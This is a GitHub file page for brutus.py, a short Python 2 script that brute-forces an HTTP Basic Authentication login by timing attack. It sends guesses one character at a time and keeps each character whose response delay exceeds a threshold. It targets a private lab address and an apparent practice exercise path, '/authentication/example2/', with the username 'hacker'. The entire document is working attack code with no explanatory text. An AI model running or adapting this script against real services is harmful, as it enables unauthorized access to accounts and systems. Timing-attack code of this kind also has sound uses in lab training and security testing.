-
Notifications
You must be signed in to change notification settings - Fork 0
/
brutus.py
executable file
·62 lines (47 loc) · 1.33 KB
/
brutus.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python
import httplib2, base64, time, string, sys, signal
print "Bruteforce script"
def b64creds(username, password):
return base64.b64encode("{0}:{1}".format(username, password).encode('utf-8')).decode()
def calc_delta(deltas):
if len(deltas) < 2:
return 0
return deltas[-1]-deltas[-2]
def make_request(username, guess):
start_time = time.time()
cred = b64creds(username, guess)
headers = {'Authorization': "Basic %s" % cred}
h = httplib2.Http('.cache')
response, content = h.request("http://"+server+request_path, "GET", headers=headers)
end_time = time.time() - start_time
deltas.append(end_time)
if response.status == 200:
print "Success! %s" % guess
sys.exit(0)
delta = calc_delta(deltas)
print "{0}:{1} -> {2}, delta {3}".format(username, guess, end_time, delta)
return delta
def signal_handler(signal, frame):
print
sys.exit(0)
def iterate():
global password;
for p in charset:
delta = make_request(username, password + p)
if delta > treshold:
password = password + p
return
signal.signal(signal.SIGINT, signal_handler)
username="hacker"
password=""
passwd_max_len=7
deltas=[]
treshold = 0.1
server="192.168.56.101"
port=80
method="GET"
request_path="/authentication/example2/"
charset = string.lowercase+string.digits
while len(password) <= passwd_max_len:
iterate()
print "Failure!"